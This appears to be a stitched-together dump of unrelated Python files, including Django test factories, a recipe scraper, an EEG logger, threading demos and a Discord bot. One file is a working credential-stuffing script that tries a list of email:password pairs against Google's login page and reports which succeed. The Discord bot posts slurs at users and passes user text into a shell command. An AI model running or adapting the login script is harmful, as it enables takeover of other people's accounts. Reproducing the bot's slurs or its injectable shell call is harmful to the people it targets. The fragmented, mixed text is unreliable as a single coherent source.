#storage.child(path_on_cloud).put(path_local)
#d = os.getcwd
#os.chdir(d)
storage.child(path_on_cloud).download("lol.xlsx")
|
# -*- coding: utf-8 -*-
import factory
from factory.django import DjangoModelFactory
from ralph.accounts.tests.factories import UserFactory
from ralph.operations.models import (
Change,
Failure,
Incident,
Operation,
OperationStatus,
OperationType,
Problem
)
def get_operation_type(name):
    # Fetch the existing OperationType row by its name.
    return OperationType.objects.get(name=name)
def get_operation_status(name):
    # Fetch the existing OperationStatus row by its name.
    return OperationStatus.objects.get(name=name)
class OperationTypeFactory(DjangoModelFactory):
    # Cycles through the four known type names; get_or_create avoids duplicates.
    name = factory.Iterator(['Problem', 'Incident', 'Failure', 'Change'])
    class Meta:
        model = OperationType
        django_get_or_create = ['name']
class OperationStatusFactory(DjangoModelFactory):
    # Cycles through the four known status names; get_or_create avoids duplicates.
    name = factory.Iterator(['Open', 'Closed', 'Resolved', 'In Progress'])
    class Meta:
        model = OperationStatus
        django_get_or_create = ['name']
class OperationFactory(DjangoModelFactory):
    # Base factory: an 'Open' operation of type 'Change' with a sequential
    # title and a freshly created assignee.
    title = factory.Sequence(lambda n: 'Operation #%d' % n)
    status = factory.LazyAttribute(lambda obj: get_operation_status('Open'))
    type = factory.LazyAttribute(lambda obj: get_operation_type('Change'))
    assignee = factory.SubFactory(UserFactory)
    class Meta:
        model = Operation
class ChangeFactory(OperationFactory):
    # Inherits the 'Change' type default from OperationFactory.
    class Meta:
        model = Change
class FailureFactory(OperationFactory):
    # Overrides the base type with 'Failure'.
    type = factory.LazyAttribute(lambda obj: get_operation_type('Failure'))
    class Meta:
        model = Failure
class ProblemFactory(OperationFactory):
    # Overrides the base type with 'Problem'.
    type = factory.LazyAttribute(lambda obj: get_operation_type('Problem'))
    class Meta:
        model = Problem
class IncidentFactory(OperationFactory):
    # Overrides the base type with 'Incident'.
    type = factory.LazyAttribute(lambda obj: get_operation_type('Incident'))
    class Meta:
        model = Incident
|
import time
import winsound
from multiprocessing import Process, Event, Lock
from pyemotiv import Epoc
from pyfob import Fob
WINL = 300
def emotiv(e):
    # Stream raw Emotiv Epoc EEG samples to emotiv.dat for WINL seconds.
    # Waits on the shared Event so logging starts only after the ascension
    # tracker process has initialised.  (Python 2 code.)
    epoc = Epoc()
    fid = open('emotiv.dat', 'w')
    e.wait()
    t0 = time.time()
    tp = time.time()
    while tp - t0 < WINL:
        tp = time.time()
        data = epoc.get_raw()
        m, n = data.shape
        # One output line per sample: 14 channel values per column.
        for i in range(n):
            fid.write(
                "%8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f %8.12f\n" % tuple(
                    data[:, i]))
    fid.close()
    print 'Emotiv stop...'
def ascension(e):
    # Sample the Flock of Birds tracker every 7.5 ms (~133 Hz) for WINL
    # seconds, logging elapsed time + position + orientation to fob.dat.
    # Sets the shared Event once the tracker is ready so emotiv() starts
    # in sync.  (Python 2 code.)
    fob = Fob()
    fid = open('fob.dat', 'w')
    e.set()
    t0 = time.time()
    tp = time.time()
    while time.time() - t0 < WINL:
        ti = time.time()
        if ti - tp >= (0.0075):
            tp = time.time()
            x, y, z, roll, pitch, yaw = fob.get_posang()
            fid.write("%8.3f %8.3f %8.3f %8.3f %8.3f %8.3f %8.3f\n" % (tp - t0, x, y, z, roll, pitch, yaw))
    fid.close()
    fob.close()
    print 'Ascension stop...'
if __name__ == '__main__':
    # Audible-cue parameters: 2500 Hz beep lasting 2000 ms.
    Freq = 2500
    Dur = 2000
    event = Event()
    # EEG logger and position tracker run as separate processes; the Event
    # makes the EEG logger wait until the tracker is initialised.
    p1 = Process(target=emotiv, args=(event,))
    p2 = Process(target=ascension, args=(event,))
    p1.start()
    p2.start()
    event.wait()
    idx = 0
    t0 = time.time()
    while time.time() - t0 < WINL:
        # Beep roughly every 15 s (2 s beep + 13 s sleep) during recording.
        idx += 1
        print idx
        winsound.Beep(Freq, Dur)
        time.sleep(13)
|
import mechanize
def readFile(path):
file = open(path,'r')
content = file.read()
return content
arrayLogins = readFile('logins_gmail.txt').split('\n')
url = "https://accounts.google.com/ServiceLoginAuth"
browser = mechanize.Browser()
browser.set_handle_equiv(True)
browser.set_handle_redirect(True)
browser.set_handle_referer(True)
browser.set_handle_robots(False)
browser.open(url)
for i in range(0, len(arrayLogins)):
login = (arrayLogins[i].split(':'))[0]
pw = (arrayLogins[i].split(':'))[1]
#browser.select_form('LoginForm') #selecionar pelo nome do fomr
browser.select_form(nr=0) #prrimeiro formulario da pag se for sem nome
#preencher
browser.form['Email'] = login
browser.form['Passwd'] = pw
#submit
browser.method = "POST"
resp = browser.submit()
if resp.geturl() != "https://accounts.google.com/ServiceLoginAuth":
print "LOGIN CORRETO! ===>",login," ", pw
browser.back();
else:
print "WRONG ============>", login, " ", pw
browser.back();
|
# Given a m * n matrix of distinct numbers, return all lucky numbers
# in the matrix in any order.
#
# A lucky number is an element of the matrix such that it is the
# minimum element in its row and maximum in its column.
class Solution:
    def luckyNumbers(self, matrix):
        """Return the set of values that are simultaneously the minimum of
        their row and the maximum of their column (entries are distinct)."""
        row_minimums = {min(row) for row in matrix}
        column_maximums = {max(col) for col in zip(*matrix)}
        return row_minimums & column_maximums
if __name__ == "__main__":
testinput = [[3, 7, 8], [9, 11, 13], [15, 16, 17]]
print(Solution.luckyNumbers(Solution, testinput))
|
from datetime import datetime

# 1. zero-padded date components -> YYYY-MM-DD
now = datetime.now()
cur_year = now.year
cur_month = now.month
cur_day = now.day
date_str = f"{cur_year:04d}-{cur_month:02d}-{cur_day:02d}"
print(date_str)

# 2. fixed-point with two decimals
value = f"{3.1415926:.2f}"
print(value)            # 3.14

# explicit sign
value = f"{-1:+.2f}"
print(value)            # -1.00

# left-aligned, padded with 'x' to width 4
value = f"{5:x<4d}"
print(value)            # 5xxx

# thousands separator
value = f"{1000000:,}"
print(value)            # 1,000,000

# scientific notation with two decimals
value = f"{1000000000:.2e}"
print(value)            # 1.00e+09

value = f"{13:10d}"     # right aligned (default, width 10)
print(value)

value = f"{13:<10d}"    # left aligned (width 10)
print(value)

value = f"{13:^10d}"    # center aligned (width 10)
print(value)
import requests
import time
from bs4 import BeautifulSoup
from recipes.models import Recipe
class BudgetByteScraper:
    """
    Scrapes recipe data from budgetbytes.com and loads it into app database
    """
    def __init__(self):
        self.recipe_list = []   # recipe URLs gathered from the archive pages
        self.count = 0          # number of extra archive pages visited
    def populate_recipe_list(self):
        # Walk the paginated recipe archive and collect every recipe link.
        recipe_index = requests.get('https://www.budgetbytes.com/category/recipes/page/2/')
        soup = BeautifulSoup(recipe_index.content, 'html.parser')
        recipe_archives = soup.find('div', class_='archives').children
        # Get all recipe links on the page and save them in list
        for recipe in recipe_archives:
            for a in recipe.find_all('a', href=True):
                self.recipe_list.append(a['href'])
        # Grab the next page if it exists
        next_page_url = soup.find('a', class_='next', href=True)['href']
        while(True):
            next_recipe_page = requests.get(next_page_url)
            inside_soup = BeautifulSoup(next_recipe_page.content, 'html.parser')
            recipe_archives = inside_soup.find('div', class_='archives').children
            # Get all recipe links on the page and save them in list
            for recipe in recipe_archives:
                for a in recipe.find_all('a', href=True):
                    self.recipe_list.append(a['href'])
            next_page_url = inside_soup.find('a', class_='next', href=True)
            if(next_page_url == None):
                # no "next" link on the page -> last archive page reached
                break
            next_page_url = next_page_url['href']
            self.count += 1
    def export_recipe_to_app(self, recipe_url):
        # Parse one recipe page and persist it through the Recipe model.
        recipe_page =requests.get(recipe_url)
        soup = BeautifulSoup(recipe_page.content, 'html.parser')
        name = soup.find('h2', class_='wprm-recipe-name')
        ingredients_area = soup.find('ul', class_='wprm-recipe-ingredients')
        # If there is not an ingredients_area it is not a recipe
        if ingredients_area == None: return
        ingredients_list = []
        for ingredient in ingredients_area:
            ingredients_list.append(ingredient.text)
        instructions_area = soup.find('ul', class_='wprm-recipe-instructions')
        instructions_list = []
        for instructions in instructions_area:
            instructions_list.append(instructions.text)
        times = soup.find_all('span', class_='wprm-recipe-time')
        # If times does not have more than 2 entries it is not actually a recipe
        if len(times) < 2: return
        image = soup.find('img', class_='attachment-200x200')
        author = soup.find('span', class_='wprm-recipe-author')
        keywords = soup.find('span', class_='wprm-recipe-keyword')
        # Handle case of some recipes not having keywords
        if keywords == None:
            keywords_django = ''
        else:
            keywords_django = keywords.text
        # Handle case of some recipes not having an author
        if author == None:
            author_django = ''
        else:
            author_django = author.text
        # NOTE(review): `in` on a bs4 Tag inspects its children, not its
        # attributes, so this test likely never matches 'data-lazy-src';
        # `image` can also be None here, which would raise.  Confirm the
        # intended attribute check (image.get('data-lazy-src')).
        if 'data-lazy-src' in image:
            image_url_django = image['data-lazy-src']
        else:
            image_url_django = None
        Recipe.objects.get_or_create(
            name=name.text,
            ingredients=':'.join(ingredients_list),
            instructions=':'.join(instructions_list),
            prep_time=times[0].text,
            cook_time=times[1].text,
            image_url=image_url_django,
            keywords=keywords_django,
            author=author_django,
        )
        # id = 'some identifier'
        # person, created = Person.objects.get_or_create(identifier=id)
        # if created:
        # # means you have created a new person
        # else:
        # # person just refers to the existing one
    def scrape_em_all(self):
        # Collect every recipe URL, then import them one by one, sleeping
        # 5 s between requests to stay polite to the server.
        self.populate_recipe_list()
        count = 0
        for recipe in self.recipe_list:
            self.export_recipe_to_app(recipe)
            count = count + 1
            print(count)
            time.sleep(5)
        print("{} Recipes imported".format(count))
# imp = BudgetByteScraper()
# imp.scrape_em_all() |
#!/usr/bin/python3
''' 0x0A-python-inheritance module '''
def is_same_class(obj, a_class):
    ''' Check whether the concrete type of obj is exactly a_class.

    Instances of subclasses do not count: only an exact type match
    yields True.
    '''
    return a_class is type(obj)
|
import discord
from discord.ext import commands
import wolframalpha
import aiohttp, io, asyncio
import requests, json
import shutil, os
import time
import tokens
from bs4 import BeautifulSoup as soup
from urllib.request import urlopen as uReq
# globals
TOKEN = tokens.DISCORD_TOKEN  # Discord bot token (kept in tokens.py, out of source)
WOLFRAM_ID = tokens.WOLFRAM_TOKEN  # Wolfram|Alpha application id
client = commands.Bot(command_prefix="chad ")
wolframClient = wolframalpha.Client(WOLFRAM_ID)
starttime = time.perf_counter()  # process start time, read by the `uptime` command
deleted_image_storage = []  # "<author> <url>" strings for every attachment seen
voice_client = None  # current voice connection, set by `join`/`play`
queue_list = []  # song names appended by `play` while audio is already playing
copypath = "./temp/bot_settings_copy.json"
# remove all temp files
# Recreate ./temp/ from scratch on every startup and snapshot the settings file.
if os.path.isdir("./temp/"):
    shutil.rmtree("temp")
os.makedirs("temp")
shutil.copy("./bot_settings.json", copypath)
def isFloat(string):
    """Return True if *string* can be parsed as a float."""
    try:
        float(string)
        return True
    except ValueError:
        return False


def isInt(string):
    """Return True if *string* parses as a float with an integral value.

    BUG FIX: the original compared float(string) == int(string), so any
    value with a decimal point (e.g. "3.5") raised ValueError from int(),
    and "inf"/"nan" raised OverflowError/ValueError. All such inputs now
    simply return False.
    """
    if isFloat(string):
        return float(string).is_integer()
    return False
def listToString(list):
    """Concatenate the items of *list*, appending a space after each one.

    Note the result keeps a trailing space (e.g. ["a", "b"] -> "a b ").
    """
    return "".join(item + " " for item in list)
def is_me(m):
    # Predicate for channel.purge(check=...): True when message `m` was
    # sent by this bot itself.
    return m.author == client.user
def getjson():
    """Load and return the bot settings dict from ./bot_settings.json.

    BUG FIX: the original opened the file without ever closing it, leaking
    a file handle on every call (and this is called on every message).
    """
    with open("./bot_settings.json", "r") as settings_file:
        return json.load(settings_file)
def check_perms(user, level):
    """Return True if *user* is listed under the given userlist *level*
    (e.g. "admins" or "blacklist") in bot_settings.json."""
    members = getjson()["userlist"][level]
    for key in members:
        if members[key] == user:
            return True
    return False
def updatejson(*args):
    """Mutate bot_settings.json in place and echo the new object.

    Accepted argument forms:
      ("delete", "userlist", level, key) -> remove a userlist entry
      ("delete", other, key)             -> remove a settings key
      (section, key, value)              -> set obj[section][key] = value
      (section, sub, key, value)         -> set obj[section][sub][key] = value
    """
    obj = getjson()
    if args[0] == "delete":
        if args[1] == "userlist":
            del obj["userlist"][args[2]][args[3]]
        else:
            del obj["settings"][args[2]]
    else:
        if len(args) > 3:
            obj[args[0]][args[1]][args[2]] = args[3]
        else:
            obj[args[0]][args[1]] = args[2]
    # BUG FIX: the original wrote to "bot_settings" (no .json extension), so
    # changes were never visible to getjson(), which reads
    # ./bot_settings.json. Also use a context manager instead of a manual
    # open/close pair.
    with open("./bot_settings.json", "w") as settings_file:
        json.dump(obj, settings_file)
    print(obj)
@client.event
async def on_ready():
    # Fired once the gateway connection is established: log readiness and
    # set the bot's "playing" status.
    print(" the bot is ready")
    await client.change_presence(activity=discord.Game("in bed with Daddy Bot")
)
@client.event
async def on_message(message):
    """Central message hook.

    Applies "rude mode" gating, taunts specific senders, archives image
    attachments, blocks blacklisted users, then forwards everything else
    to the command processor.
    """
    # "rude" mode is re-read from disk on every message.
    rude = False
    if getjson()['settings']['rude'] == 'true':
        rude = True
    # respond to daddybot
    if (str(message.author) == "DaddyBot#2616" and rude):
        await message.channel.send("shut the fuck up daddybot")
    # respond to blacklisted users
    if (check_perms(str(message.author), "blacklist")
            and message.content[:4] == "chad"):
        await message.channel.send("shut the fuck up faggot")
    # respond to people trying to use the bot when rude
    if (not check_perms(str(message.author), 'admins') and rude
            and message.content[:4] == "chad"):
        await message.channel.send("shut the fuck up faggot")
        return
    try:
        # Archive the first attachment: remember "<author> <url>" and save a
        # local copy. NOTE(review): the [:-1] slice drops the final character
        # of str(attachment) — confirm that is intended for this discord.py
        # version.
        mystr = str(message.attachments[0])
        print(mystr)
        myurl = mystr[mystr.find("https"):-1]
        deleted_image_storage.append(str(message.author) + " " + myurl)
        file = requests.get(myurl)
        open("./temp/testfile.png", "wb").write(file.content)
    except:
        # NOTE(review): bare except silently swallows network and file errors
        # in addition to the expected IndexError for attachment-less messages.
        pass
    if check_perms(str(message.author), "blacklist"):
        return
    await client.process_commands(message)
@client.event
async def on_message_delete(message):
    """Announce deleted messages, except those deleted by admins."""
    # BUG FIX: check_perms compares against the string names stored in
    # bot_settings.json, and every other call site passes str(author).
    # The original passed the Member object itself, so the admin exemption
    # never matched and admin deletions were always announced.
    if check_perms(str(message.author), 'admins'):
        return
    await message.channel.send(
        f"{message.author} deleted a message: {message.content}")
@client.command()
async def ping(ctx):
    """Report the bot's websocket latency in milliseconds."""
    latency_ms = round(client.latency * 1000)
    await ctx.send(f" {latency_ms} ms")
@client.command()
async def clear(ctx, amount, arg="quiet"):
    """Bulk-delete `amount` messages from the channel (admins only).

    Purges amount + 1 messages so the invoking "chad clear" command is
    removed as well. Pass any second argument other than "quiet" to get a
    confirmation message afterwards.
    """
    if not check_perms(str(ctx.author), "admins"):
        await ctx.send("shut up retard")
        return
    await ctx.channel.purge(limit=int(amount) + 1)
    if arg != "quiet":
        await ctx.send(f"deleted {amount} messages")
@client.command()
async def wolfram(ctx, *args):
    """Query Wolfram|Alpha with the given words and post the first result."""
    try:
        query = " ".join(args)
        res = wolframClient.query(query)
        # next() raises StopIteration when Wolfram returns no result pods.
        answer = next(res.results).text
        await ctx.send(answer)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate instead of being reported as a failed lookup.
        await ctx.send("Wolfram failed to find an answer")
@client.command()
async def wolframimage(ctx, *args):
    """Query the Wolfram|Alpha Simple API and post the rendered result image."""
    query = "+".join(args)
    url = f"http://api.wolframalpha.com/v1/simple?appid={WOLFRAM_ID}&i="
    if query:
        url += query + "%3F"
    else:
        # Mirror the original's behavior for an empty query: it always
        # stripped one trailing character (the "=") before the marker.
        url = url[:-1] + "%3F"
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as resp:
            if resp.status != 200:
                return await ctx.send("Could not download file...")
            data = io.BytesIO(await resp.read())
            await ctx.send(file=discord.File(data, "cool_image.png"))
@client.command()
async def say(ctx, *args):
    # Echo the command arguments back into the channel (space-joined, with a
    # trailing space from listToString).
    await ctx.send(listToString(args))
@client.command()
async def status(ctx, *, args):
    """Set the bot's "playing" status text (admins only)."""
    if not check_perms(str(ctx.author), "admins"):
        await ctx.send("shut up retard")
        return
    await client.change_presence(activity=discord.Game(args))
    await ctx.send(f"status changed to {args}")
@client.command()
async def translate(ctx, *, args):
    """Convert a message to or from the symbol alphabet below.

    Direction is decided from the FIRST character of the message: if it is
    a plain lowercase letter or space, the whole message is encoded;
    otherwise every character is decoded back.
    NOTE(review): on the encode path, a character not in `alphabet` makes
    find() return -1, which silently maps it to the LAST symbol ("'") —
    presumably unintended, confirm. On the decode path an unknown symbol
    raises ValueError from index().
    """
    alphabet = " abcdefghijklmnopqrstuvwxyz"
    # betterAlphabet[i] is the symbol for alphabet[i]; index 0 is the space.
    betterAlphabet = [
        " ",
        "ᔑ",
        "ʖ",
        "ᓵ",
        "↸",
        "ᒷ",
        "⎓",
        "⊣",
        "⍑",
        "╎",
        "⋮",
        "ꖌ",
        "ꖎ",
        "ᒲ",
        "リ",
        "𝙹",
        "!",
        "¡",
        "ᑑ",
        "∷",
        "ᓭ",
        "ℸ",
        "̣",
        "⚍",
        "⍊",
        "∴",
        "'",
    ]
    newStr = ""
    for i in args:
        # args[0] (not i) is tested here, so the direction is constant for
        # the whole message.
        if alphabet.find(args[0]) != -1:
            place = alphabet.find(i)
            newStr += betterAlphabet[place]
        else:
            place = betterAlphabet.index(i)
            newStr += alphabet[place]
    await ctx.send(newStr)
@client.command()
async def spam(ctx, *args):
    """Repeat a message: `chad spam <words...> <count>`.

    The last argument is the repeat count; everything before it is the text.
    """
    try:
        repeats = int(args[-1])
    except (IndexError, ValueError):
        # BUG FIX: the original's bare `except:` wrapped the send loop too,
        # so a failed ctx.send() was misreported as "enter a number".
        await ctx.send("enter a number retard")
        return
    text = listToString(args[:-1])
    for _ in range(repeats):
        await ctx.send(text)
@client.command()
async def clearspace(ctx, *, args):
    """Echo the message back with every space character removed."""
    squeezed = "".join(ch for ch in args if ch != " ")
    await ctx.send(squeezed)
@client.command()
async def kill(ctx):
    # Shut the bot process down; restricted to the hard-coded owner account.
    if str(ctx.author) != "asiank0ala#8008":
        await ctx.send("shut the fuck up faggot")
    else:
        await ctx.send(":cry:")
        exit()
@client.command()
async def sonic(ctx):
    # Post a fixed link to a hosted sonic movie clip.
    await ctx.send(
        "https://cdn.discordapp.com/attachments/619660668580266005/712416983437803592/sonic_movie.mp4"
    )
@client.command()
async def clearbot(ctx, amount):
    """Delete this bot's own messages from the channel (admins only).

    Scans the most recent `amount` messages and removes the ones authored
    by the bot.
    """
    if not check_perms(str(ctx.author), "admins"):
        await ctx.send("shut up retard")
        return
    # BUG FIX: the original always purged with limit=100 (ignoring `amount`)
    # and then claimed it had deleted `amount` messages. Scan `amount`
    # messages and report the number actually removed (purge returns the
    # list of deleted messages).
    deleted = await ctx.channel.purge(limit=int(amount), check=is_me)
    await ctx.send(f"deleted {len(deleted)} messages")
@client.command()
async def update(ctx, *args):
    """Edit bot_settings.json from chat (admins only).

    Argument forms:
      delete userlist <level> <key>   -> remove a userlist entry
      delete <other> <key>            -> remove a settings key
      <section> <key> <value>         -> set obj[section][key]
      <section> <sub> <key> <name...> -> set obj[section][sub][key] to the
                                         space-joined remaining words
    NOTE(review): this duplicates the logic of updatejson() above but writes
    to ./bot_settings.json — the two should share one implementation.
    """
    if not check_perms(str(ctx.author), "admins"):
        await ctx.send("shut up retard")
        return
    obj = getjson()
    if args[0] == "delete":
        if args[1] == "userlist":
            del obj["userlist"][args[2]][args[3]]
        else:
            del obj["settings"][args[2]]
    else:
        if len(args) > 3:
            # Re-join the remaining words so usernames may contain spaces;
            # the trailing space added by the loop is stripped with [:-1].
            username = ''
            for k in args[3:]:
                username += k
                username += ' '
            obj[args[0]][args[1]][args[2]] = username[:-1]
        else:
            obj[args[0]][args[1]] = args[2]
    settings_file = open("./bot_settings.json", "w")
    json.dump(obj, settings_file)
    settings_file.close()
    await ctx.send(obj)
@client.command()
async def getsettings(ctx):
    # Dump the entire settings dict (including the token-free userlist) to chat.
    await ctx.send(getjson())
@client.command()
async def opgg(ctx, *args):
    """Link the na.op.gg profile page for the given summoner name."""
    # URL-encode spaces between the name's words; a trailing %20 is kept
    # (op.gg tolerates it), matching the original behavior.
    summoner = "".join(word + "%20" for word in args)
    await ctx.send("https://na.op.gg/summoner/{}".format(summoner))
@client.command()
async def join(ctx):
    """Connect the bot to the caller's current voice channel."""
    # NOTE(review): raises AttributeError if the caller is not in a voice
    # channel (ctx.author.voice is None) — confirm whether that is handled
    # upstream.
    global voice_client
    channel = ctx.author.voice.channel
    voice_client = await channel.connect()
@client.command()
async def play(ctx, *, args):
    """Search YouTube for *args*, download the audio, and play it.

    Scrapes the YouTube results page for the first /watch?v= id, downloads
    the audio with youtube-dl into ./temp/, and plays it on the current
    voice connection.
    NOTE(review): requires a prior `join` — voice_client is None otherwise
    and .is_connected() raises AttributeError. Songs appended to queue_list
    are never consumed anywhere in this file. The os.system() call embeds
    user-controlled text in a shell command — shell-injection hazard; should
    use subprocess.run([...], shell=False).
    """
    global voice_client
    channel = ctx.author.voice.channel
    if not voice_client.is_connected():
        voice_client = await channel.connect()
    # Build the search query: spaces become '+' for the URL.
    newargs = ""
    for i in args:
        if i != " ":
            newargs += i
        else:
            newargs += "+"
    print(newargs)
    myurl = "https://www.youtube.com/results?search_query={}".format(newargs)
    uClient = uReq(myurl)
    page_html = uClient.read()
    uClient.close()
    page_soup = soup(page_html, "html.parser")
    # The second <script> inside <body dir="ltr"> contains the results JSON;
    # the first "/watch?v=" occurrence is taken as the top hit.
    results_text = page_soup.findAll("body",
                                     {"dir": "ltr"})[0].findAll("script")[1]
    code_index = str(results_text).index(r"/watch?v=") + 9
    vid_code = str(results_text)[code_index:code_index + 11]
    # Rebuild the name with underscores for use as the local filename.
    newargs = ""
    for i in args:
        if i != " ":
            newargs += i
        else:
            newargs += "_"
    video_url = "https://www.youtube.com/watch?v={}".format(vid_code)
    os.system(
        r"youtube-dl -o C:\Users\neilm\Documents\vscode\chadbot\temp\{}.%(ext)s --extract-audio --audio-format mp3 {}"
        .format(newargs, video_url))
    await ctx.send("video found: {}".format(video_url))
    if voice_client.is_playing():
        queue_list.append(newargs)
    voice_client.play(discord.FFmpegPCMAudio("./temp/{}.mp3".format(newargs)))
@client.command()
async def leave(ctx):
    # Disconnect the bot from the guild's voice channel.
    await ctx.voice_client.disconnect()
@client.command()
async def dm(ctx, user, *, args):
    """DM `args` to the named guild member, then delete the invoking message."""
    # NOTE(review): get_member_named returns None for unknown names, which
    # makes target.send raise AttributeError — confirm that is acceptable.
    target = ctx.guild.get_member_named(user)
    await target.send(args)
    await ctx.channel.purge(limit=1)
@client.command()
async def id_dm(ctx, id, *, args):
    """DM `args` to the user with the given id, then delete the invoking message."""
    target = await client.fetch_user(id)
    # BUG FIX: the original called target.send() with no arguments, so the
    # message text was never sent (compare the `dm` command above).
    await target.send(args)
    await ctx.channel.purge(limit=1)
@client.command()
async def uptime(ctx):
    """Report how long the bot has been running, formatted H:M:S."""
    diff = time.perf_counter() - starttime  # elapsed seconds
    # BUG FIX: the original used minutes = diff // 60, which counts the
    # hours a second time, driving the seconds field negative after the
    # first hour of uptime. Take each field modulo the next larger unit.
    hours = diff // 3600
    minutes = (diff % 3600) // 60
    seconds = diff % 60
    await ctx.send(f"{int(hours)}:{int(minutes)}:{int(seconds)}")
@client.command()
async def getid(ctx, user):
    # Look up a guild member by display name and reply with their numeric id.
    target = ctx.guild.get_member_named(user)
    await ctx.send(target.id)
@client.command()
async def test(ctx, url):
    """Download *url* (following redirects) and save it as ./5Head.jpg."""
    r = requests.get(url, allow_redirects=True)
    # BUG FIX: use a context manager so the file handle is closed; the
    # original leaked the handle returned by open().
    with open("./5Head.jpg", "wb") as out:
        out.write(r.content)
@client.command()
async def belle(ctx):
    # Post the full "Belle Delphine" meme-song lyrics as a single message.
    await ctx.send("""You were thinking I died? Bitch, surprise
I still got them double-thick thighs, french fries
I get down and gobble, gobble up, with my booty up
She be going wobble wobble up, here's a big duck
Slide, slide in the peanut butter, don’t Zucc her
Who actually regrets me? My mother
I trolled betas with my Pornhub, betrayer
You nothin' but a hater hater, clout chaser
Now I watch my favorite Twitch thot, damn, she hot
What the fuck is with this mugshot? Ratatata
Elon's baby eat a Mars rock
Now I TikTok, begone, thot, begone, thot
All these simps always talkin’ shit, yada-yada-ya
When you see me, what you talking 'bout, little beansprout?
We're laughing 'cause you burnt out, got no clout
Yeah, you weak without your ass out (Yeah, yeah)
(What are you, fucking gay?)
Are you dumb, stupid, or dumb, huh?
Play me like a dummy, like, bitch, are dumb?
Are you dumb, stupid, or dumb?
Yeah, you got your money but you still freakin' ugly
XD, listen, you're not a politician
Yes, I'm a gamer, also a taxpayer
Skeet, yada, pass me Doritos
Send nudes, nani? Delphine, you nasty
Egg white, bite it, see that, get excited
Good vid, Susan, not allowed, copyrighted
You're boomer, I’m doomer, guess what? You die sooner
(Hey, that’s pretty good)
You were thinking I died? Bitch, surprise
I still got them double-thick thighs, no lies
I get down and gobble, gobble up, with my booty up
She be going wobble wobble up, here's a big duck
Slide, slide in the peanut butter, don’t Zucc her
Who actually regrets me? My mother
I trolled betas with my Pornhub, betrayer
You nothin' but a hater hater, clout chaser
You're mad I'm back? Big mad
He’s mad, she's mad, big sad
Haha, don't care, stay mad
Aha, aha, aha
Uwu, buy my OnlyFans, you big Chad
Little titties, big ass, and no dad
Bathwater sold out, big sad
OnlyFans now to get a big bag
Omae wa mō shindeiru
Nani?""")
# Start the bot's event loop; this call blocks until the process exits.
client.run(TOKEN)
|
import threading
import time
import logging
logging.basicConfig(level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s')
def daemon():
    # Daemon worker: sleeps long enough for the main thread to finish first,
    # demonstrating that daemon threads are killed when the interpreter exits.
    logging.debug('Starting')
    time.sleep(2)
    logging.debug('Exiting')
# Create the daemon thread before starting it below.
# NOTE(review): setDaemon() is the legacy spelling; modern Python passes
# daemon=True to the Thread constructor instead.
d = threading.Thread(name='daemon', target=daemon)
d.setDaemon(True)
def non_daemon():
    # Regular (non-daemon) worker: exits immediately, so the interpreter
    # waits for it but not for the daemon thread.
    logging.debug('Starting')
    logging.debug('Exiting')
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
# To wait until a daemon thread has completed its work, use the join() method.
# By default, join() blocks indefinitely. It is also possible to pass a timeout
# argument (a float representing the number of seconds to wait for the thread
# to become inactive). If the thread does not complete within the timeout period,
# join() returns anyway.
d.join(1)
# NOTE(review): Python 2 print statement — this script will not parse under
# Python 3 (and Thread.isAlive() was removed in 3.9 in favour of is_alive()).
print 'd.isAlive', d.isAlive()
t.join()
"""
(daemon ) Starting
(non-daemon) Starting
(non-daemon) Exiting
d.isAlive True
"""
|
# coding: utf-8
# Python 2 script: tokenizes Rakuten review files with MeCab and writes one
# whitespace-separated word file per user as LDA input.
import MeCab
f = open("../Rakuten-real-/userID150-165.csv")
li = []
# Collect the user ids, stripping the trailing newline from each line.
for id in f:
    li.append(id[:-1])
parse = MeCab.Tagger("mecabrc")
# NOTE(review): indexes li[397..399] — confirm the id file really has at
# least 400 lines; otherwise this raises IndexError.
for user in range(397,400):
    g = open("../rakutendb/150-165/"+li[user]+".csv")
    bg = open("../rakutendb/150-165lda/"+li[user]+".csv","w")
    hhh = 0
    # First pass: count this user's non-URL lines and write the count.
    for nn in g:
        if nn.find("http") > -1:
            continue
        hhh += 1
    g.close()
    bg.write(str(hhh) + "\n")
    # Second pass: tokenize up to 101 review lines from each referenced
    # item-review file.
    g = open("../rakutendb/150-165/"+li[user]+".csv")
    for ji in g:
        targ = ji.split(",")
        if targ[0].find("http") > -1:
            continue
        # NOTE(review): rebinds `f` (the id-file handle opened above) —
        # harmless only because that file was already fully consumed.
        f = open("../Rakuten-real-/item_review150-165/"+targ[0]+".csv")
        #bg = open("../rakutendb/LDA_item_word/"+targ[0]+".csv","w")
        #wr = open("../rakutendb/150-165lda/"+targ[0]+".csv","w")
        rev = 0
        for line in f:
            result = parse.parseToNode(line)
            # Walk the MeCab node chain; feature field 6 is the base form,
            # "*" meaning "no base form available".
            while result:
                feat = result.feature.split(",")
                if (feat[6].decode("utf-8").encode("utf-8") != "*"):
                    bg.write(feat[6].decode("utf-8").encode("utf-8") + " ")
                result = result.next
            #bg.write("\n")
            if rev == 100:
                break
            rev += 1
        f.close()
        #bg.close()
    bg.write("\n")
|
import time
import requests
import json
from spotibot.core.objects import Time as spottime, User as user
from spotibot.core.utils import Hasher as hasher
from spotibot.mongo.utils.Handlers import get_serializable
# TODO: Need to have something here that indicates downstream actions to not
# even attempt to execute if it returns nothing/playback has gone dormant
# class Response:
#
# def __init__(self, response):
#
# self.ok: bool = response.ok
#
# self.status_code: int = response.status_code
#
# if self.ok and self.status_code == 200:
# self.result: dict = response.json()
# else:
# self.result: dict = {}
#
# def __eq__(self, other) -> bool:
# """Equality comparison to other objects.
#
# Args:
# other: Comparison object
#
# Returns:
# Boolean value indicating whether or not the attributes and their
# associated values are equal between the two objects
# """
# return vars(self) == vars(other)
#
# def __getitem__(self, item: str):
# """Getter method for subscriptability.
#
# Args:
# item: Attribute to get the value of
#
# Returns:
# Attribute value if exists in object's namespace
# """
# return getattr(self, item)
#
# def get(self, item: str, default=None):
# """Method for extracting attributes without throwing existence errors.
#
# Args:
# item: Attribute to get the value of
# default: Return value if attribute doesn't exist
#
# Returns:
# Attribute value or default if attribute does not exist
# """
# return vars(self).get(item, default)
#
# def to_dict(self) -> dict:
# """Calling utility serialization method on all attributes.
#
# Returns:
# String following valid json structure for mongo serialization.
# """
# return {k: get_serializable(v) for k, v in vars(self).items()}
#
# @property
